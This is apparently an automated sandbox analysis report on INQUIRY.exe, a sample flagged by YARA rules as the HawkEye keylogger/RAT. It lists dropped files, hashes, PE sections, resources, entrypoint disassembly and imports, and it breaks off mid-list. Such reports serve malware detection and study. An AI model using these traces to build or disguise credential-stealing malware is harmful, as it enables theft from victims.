                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:02:53 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7023137
                                                                      Entropy (8bit):4.716145709461237
                                                                      Encrypted:false
                                                                      SSDEEP:98304:XYElKgNP5N9H5ZFx1r+VTJb1XacA8nLqYT3bXUyYjgtXSiqjoUt8MS:XbKgjN9HVsvVrttXS+
                                                                      MD5:727EDE66BE753BF43CC3BB8AD0424846
                                                                      SHA1:6D36C62C3F02AC08483F5C46ECAE760987320DCF
                                                                      SHA-256:790BA9AF55C3D758F27EF0D7863D6CB9A56EAFA041302FF6E05DD97CF97AC35F
                                                                      SHA-512:E96B87EEFC7CD22C841C78A61B34466AD208935E6ACAA741204F87FBBFCADA9B9EF12B6E3C4E9379491B5A6BEED83DA044D60F1774519197CFF5A50636035656
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      Preview: MDMP....... ........)._!..................U...........B.......8......GenuineIntelW...........T...........z)._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3AF.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):6324
                                                                      Entropy (8bit):3.7341230330284576
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNiGR6OjGY0uuS8+prm89bkasfCCsm:RrlsNiY6DYPuS/k5fCo
                                                                      MD5:5D356EEFFF6F12474642A2400398FCD4
                                                                      SHA1:51D9FB907FDCABE46A83942DF50444C241FC8F63
                                                                      SHA-256:53E30E0481710B622CD95CFADFD2017035084D91E8EFDF6D2BF3EEDF642EF4F5
                                                                      SHA-512:B33ACA3565A56D25A75FB3D09CF4E818502C92DA36C13E3277076147DC05F9D9BEF1AAFFCD81E0A2F4831560579BAB3E2688DCB4EC723064BA3576CBEF39A17E
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.8.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6FC.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.511253263073843
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsBJgtWI9OK6oWSC8BF8fm8M4JOWjZFI+q89zApJP6v4HcHdd:uITfT4aSNkJOgEsAvP6vMidd
                                                                      MD5:4433E23608B8B2A3855C267846E81EA3
                                                                      SHA1:20A828E188264B443EC9BF44921A81DADFD4B472
                                                                      SHA-256:9632AC9115185AB53965AF43D06F0E22DC58CA6013D9DC82F82F636370757E73
                                                                      SHA-512:14C33EF3DA14C74ECEF7CDF5F79CA7C7F89415E714E06A2A5AC643B10BCE2714A44370694F8A69FC241D9547D50101F973E37CB27121CC454DD6865C33B7F751
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734353" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF38.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):7616
                                                                      Entropy (8bit):3.691270032301233
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNiin6E6YPb6EgmfZtuvUubS7+p1ct1fAldUm:RrlsNia6E6Yj6EgmfSvvbSecvfer
                                                                      MD5:ACACA69C6A291286C08D46EDABFF5680
                                                                      SHA1:D7B1662B910D8FD7961E37DB9E444921E4639EA4
                                                                      SHA-256:8EEB4DDDCF0548A987BD4BF9FE0C06E0B2C14C390D2F0F99C49CD1C5C541F745
                                                                      SHA-512:A9EB6EE1080F61332325FA1A47A26C6351A3A070B88DDBBE280D70D3C6BE4BE18E3063E83954C8949A6236C251A3B2BD52CA3176A609F3F4C916890330EDEA01
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.9.6.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFF4.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.455540365553958
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zs6JgtWI9OK6oWSC8Bv8fm8M4JFKg7Fflm+q8v5UpJP6v4Hwd:uITfI4aSNCJFKcIKGvP6vMwd
                                                                      MD5:DF582E1905AE5003E6954E4AD881502D
                                                                      SHA1:CA58F2D441FEA0F0EDB1918239EA99A9E579DE90
                                                                      SHA-256:DA6CA008EF7A7B3630E4B663CB2A6E8CE38BCC4E32E7E416950FAB100EA1F2FB
                                                                      SHA-512:5BC1A1740FC49FB50052C08845A89BFC11D4B87A83AA0B5BFEFC4682A1F9C36F7F26548BF608BF22B78BE23A721C9620E4B2A1D917BF588FF7A2DBE285F716CF
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734352" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):2
                                                                      Entropy (8bit):1.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Qn:Qn
                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                      Malicious:false
                                                                      Preview: ..
                                                                      C:\Users\user\AppData\Roaming\pid.txt
                                                                      Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):2.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Pd:F
                                                                      MD5:EFFC299A1ADDB07E7089F9B269C31F2F
                                                                      SHA1:6AFB24DE207D2E6952BA43F0E5B20BCDF0596CE5
                                                                      SHA-256:50E9A8665B62C8D68BCCC77C7C92431A1AA26CCBD38ED4BBA8DD7422A3A4AB70
                                                                      SHA-512:BD27269F95DA0217EE0999E12CC2AFC05882C559D55C1660095BB38A7D96ECB5F8210A919B24069C3FCC17CCDAA13844A75948314C74AAAC63B082DF196EA818
                                                                      Malicious:false
                                                                      Preview: 1364
                                                                      C:\Users\user\AppData\Roaming\pidloc.txt
                                                                      Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):34
                                                                      Entropy (8bit):4.0989440037669045
                                                                      Encrypted:false
                                                                      SSDEEP:3:oNt+WfWsrmC:oNwvsr7
                                                                      MD5:4FA80C1B433C83F339F774D6347C74D8
                                                                      SHA1:B5F7CA62EFB43F9A32A112C991CE22C07A8908D2
                                                                      SHA-256:25E8C1425C844373EBE82F274167A8ADEA6581F5A4F3ABC6B5F4BD0E5AE80092
                                                                      SHA-512:514421997E148C08C2BEE3664F660BEAA500881D1683F2DC6680DA7B5038857A941691871129564402768970E4463883C17A3CB186B1CCB0DE82714633B7EECF
                                                                      Malicious:false
                                                                      Preview: C:\Users\user\Desktop\INQUIRY.exe

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.893502354967658
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                      • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      File name:INQUIRY.exe
                                                                      File size:1009664
                                                                      MD5:0b940145d7d02e5b1b975c99dd5197a4
                                                                      SHA1:53ae0b576f7b362b90a25ace1470d33068db4490
                                                                      SHA256:bf487ff7cdbbd998b633b1858a939d8c808bcce65ab9937695475b39deea70a8
                                                                      SHA512:f6ea131ca86752edd8163c27ba045ff8ab4fe90a92f923565496e99d8b46ba5e99af14660bcca127a1ff06246ca262456508f6f9de2462e4cd10ba53d1428a92
                                                                      SSDEEP:12288:Hl1aMljBMKnw6WJoGPb5FUoRAVyImHlawG0h/XWl2l+klp8OdH+0YxEGIN1QpZrj:jJCKxWfPNFwyIUlawt/3mwe0dn1QT
                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:60c8d86cece67c70

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x479884
                                                                      Entrypoint Section:CODE
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:5113dec31b8616dbad783836e7188783

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      add esp, FFFFFFF0h
                                                                      mov eax, 00479694h
                                                                      call 00007F14C893661Dh
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F14C89863DDh
                                                                      mov ecx, dword ptr [00495BC8h]
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      mov edx, dword ptr [00479188h]
                                                                      call 00007F14C89863DDh
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F14C8986451h
                                                                      call 00007F14C8934114h
                                                                      lea eax, dword ptr [eax+00h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x970000x24c4.idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x57324.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000x7f70.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x9b0000x18.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      CODE0x10000x788cc0x78a00False0.524172198834data6.51448811653IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      DATA0x7a0000x1bc5c0x1be00False0.171568455717data2.71109267168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      BSS0x960000xcb10x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .idata0x970000x24c40x2600False0.352076480263data4.94171972073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .tls0x9a0000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x9b0000x180x200False0.048828125data0.20058190744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                      .reloc0x9c0000x7f700x8000False0.559631347656data6.62495186635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xa40000x573240x57400False0.922672479405data7.57976248647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_CURSOR0xa49000x134data
                                                                      RT_CURSOR0xa4a340x134data
                                                                      RT_CURSOR0xa4b680x134data
                                                                      RT_CURSOR0xa4c9c0x134data
                                                                      RT_CURSOR0xa4dd00x134data
                                                                      RT_CURSOR0xa4f040x134data
                                                                      RT_CURSOR0xa50380x134data
                                                                      RT_BITMAP0xa516c0x1d0data
                                                                      RT_BITMAP0xa533c0x1e4data
                                                                      RT_BITMAP0xa55200x1d0data
                                                                      RT_BITMAP0xa56f00x1d0data
                                                                      RT_BITMAP0xa58c00x1d0data
                                                                      RT_BITMAP0xa5a900x1d0data
                                                                      RT_BITMAP0xa5c600x1d0data
                                                                      RT_BITMAP0xa5e300x1d0data
                                                                      RT_BITMAP0xa60000x539f1dataEnglishUnited States
                                                                      RT_BITMAP0xf99f40x1d0data
                                                                      RT_BITMAP0xf9bc40xd8data
                                                                      RT_BITMAP0xf9c9c0xd8data
                                                                      RT_BITMAP0xf9d740xd8data
                                                                      RT_BITMAP0xf9e4c0xd8data
                                                                      RT_BITMAP0xf9f240xd8data
                                                                      RT_BITMAP0xf9ffc0xe8GLS_BINARY_LSB_FIRST
                                                                      RT_ICON0xfa0e40x668dataEnglishUnited States
                                                                      RT_DIALOG0xfa74c0x52data
                                                                      RT_RCDATA0xfa7a00x10data
                                                                      RT_RCDATA0xfa7b00x274data
                                                                      RT_RCDATA0xfaa240x7c3Delphi compiled form 'TForm1'
                                                                      RT_GROUP_CURSOR0xfb1e80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb1fc0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb2100x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb2240x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb2380x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb24c0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0xfb2600x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_ICON0xfb2740x14dataEnglishUnited States
                                                                      RT_HTML0xfb2880x99dataEnglishUnited States

                                                                      Imports

                                                                      DLLImport
                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                      user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                      kernel32.dlllstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                      user32.dllWindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, 